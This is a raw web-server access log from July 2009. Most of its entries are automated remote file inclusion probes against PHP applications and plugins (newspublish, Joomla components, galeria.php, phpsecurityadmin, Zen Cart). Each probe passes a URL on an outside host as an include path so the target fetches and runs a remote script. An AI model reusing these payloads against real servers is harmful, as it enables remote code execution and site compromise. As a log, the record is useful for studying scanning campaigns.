91.121.89.135 - - [18/Jul/2009:01:15:19 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:08 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:08 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:08 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
89.31.72.30 - - [18/Jul/2009:01:16:09 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aerokazachok.ru/css/id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
89.31.72.30 - - [18/Jul/2009:01:16:09 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aerokazachok.ru/css/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
91.121.89.135 - - [18/Jul/2009:01:16:14 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:16 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:17 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:01:16:51 -0400] "GET /logs/access_log.Q108062600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [18/Jul/2009:01:16:51 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.89.135 - - [18/Jul/2009:01:16:56 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://geocities.com/yohanes_sephani/pepek.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:18:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.230.9.68 - - [18/Jul/2009:01:18:28 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
211.236.242.164 - - [18/Jul/2009:01:18:32 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
87.230.9.68 - - [18/Jul/2009:01:20:32 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET /logs/access_log.Q109060100//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET /logs//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET /logs//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET //zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET //zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:17 -0400] "GET /logs/access_log.Q109060100//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
69.59.21.101 - - [18/Jul/2009:01:21:20 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:21:20 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:21:20 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.59.21.101 - - [18/Jul/2009:01:21:20 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
91.142.209.134 - - [18/Jul/2009:01:21:24 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:21:25 -0400] "GET /logs/access_log.Q109051200//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
124.217.199.214 - - [18/Jul/2009:01:21:29 -0400] "GET /logs//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
124.217.199.214 - - [18/Jul/2009:01:21:29 -0400] "GET //galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
124.217.199.214 - - [18/Jul/2009:01:21:29 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:01:21:21 -0400] "GET /logs/access_log.Q109052300 HTTP/1.0" 200 2758218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.199.214 - - [18/Jul/2009:01:21:41 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:21:47 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:21:47 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.230.9.68 - - [18/Jul/2009:01:24:00 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:24:00 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:24:00 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
87.230.9.68 - - [18/Jul/2009:01:24:00 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
124.0.145.1 - - [18/Jul/2009:01:24:02 -0400] "GET /logs/access_log.Q109052500///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:01:24:23 -0400] "GET /logs/access_log.Q109063000///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:25:01 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.88.229.100 - - [18/Jul/2009:01:25:01 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.fmi.edu.br/one/copyright[1].txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.91.170 - - [18/Jul/2009:01:25:52 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
124.217.199.214 - - [18/Jul/2009:01:25:58 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.217.199.214 - - [18/Jul/2009:01:25:59 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
89.108.91.170 - - [18/Jul/2009:01:26:01 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:26:01 -0400] "GET /logs/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 9994 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:26:02 -0400] "GET /?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
89.108.91.170 - - [18/Jul/2009:01:26:02 -0400] "GET /logs/access_log.Q109063000/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
114.200.199.144 - - [18/Jul/2009:01:26:10 -0400] "GET //newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:26:10 -0400] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:26:10 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:26:36 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:27:22 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:27:23 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.108.91.170 - - [18/Jul/2009:01:27:33 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://www.ohid.se/image?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.205.57.2 - - [18/Jul/2009:01:28:42 -0400] "GET /index1.php?site=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:01:28:42 -0400] "GET /logs/error_log.Q109052300/index1.php?site=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:01:28:42 -0400] "GET /logs/index1.php?site=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:01:29:01 -0400] "GET /logs/access_log.Q109060600/index1.php?site=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:29:58 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:29:59 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path%5Bdocroot%5D=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:30:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.142.209.134 - - [18/Jul/2009:01:32:09 -0400] "GET /logs/error_log.Q109070600%20//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:01:32:09 -0400] "GET /logs/error_log.Q109070600%20//zb41/include/write.php?dir=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Jul/2009:01:35:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.200.199.144 - - [18/Jul/2009:01:36:00 -0400] "GET /logs/access_log.Q109051600%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:36:00 -0400] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:36:00 -0400] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:36:19 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [18/Jul/2009:01:36:27 -0400] "GET /index.php?pagina=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [18/Jul/2009:01:36:27 -0400] "GET /logs/index.php?pagina=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [18/Jul/2009:01:36:27 -0400] "GET /logs/access_log.Q109070600%20%20/index.php?pagina=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [18/Jul/2009:01:36:32 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:36:46 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:36:46 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.78.116.209 - - [18/Jul/2009:01:36:46 -0400] "GET /logs/access_log.Q109063000%20%20//skin/zero_vote/ask_password.php?dir=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:01:38:26 -0400] "GET /logs/access_log.Q109051100/forum.php?act=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:01:38:26 -0400] "GET /logs/access_log.Q109070100/forum.php?act=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:01:38:26 -0400] "GET /logs/forum.php?act=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:01:38:26 -0400] "GET /forum.php?act=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
114.200.199.144 - - [18/Jul/2009:01:38:33 -0400] "GET /logs/access_log.Q109051600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:38:43 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:01:40:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.197.183.21 - - [18/Jul/2009:01:40:33 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:33 -0400] "GET //galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:33 -0400] "GET /logs//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:35 -0400] "GET //galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:35 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:35 -0400] "GET /logs//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:37 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:40:39 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:41:14 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:41:14 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:41:37 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.197.183.21 - - [18/Jul/2009:01:41:37 -0400] "GET /logs/access_log.Q109060100%20%20//galeria.php?start=0&kategoria=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id2.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:46 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:46 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:46 -0400] "GET //galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:48 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:48 -0400] "GET //galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:48 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:50 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [18/Jul/2009:01:41:52 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.198.76.196 - - [18/Jul/2009:01:42:12 -0400] "GET /logs/error_log.Q109062300//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:42:12 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
213.198.76.196 - - [18/Jul/2009:01:42:12 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
222.236.47.192 - - [18/Jul/2009:01:42:36 -0400] "GET //galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:42:36 -0400] "GET /logs//galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:42:36 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:42:41 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.242.110.197 - - [18/Jul/2009:01:42:55 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:42:56 -0400] "GET //galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:42:56 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:42:58 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.242.110.197 - - [18/Jul/2009:01:42:58 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
222.236.47.192 - - [18/Jul/2009:01:43:02 -0400] "GET //galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:43:02 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:01:43:02 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.242.110.197 - - [18/Jul/2009:01:43:03 -0400] "GET //galeria.php?start=0&kategoria=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
222.236.47.192 - - [18/Jul/2009:01:43:06 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:01:43:27 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
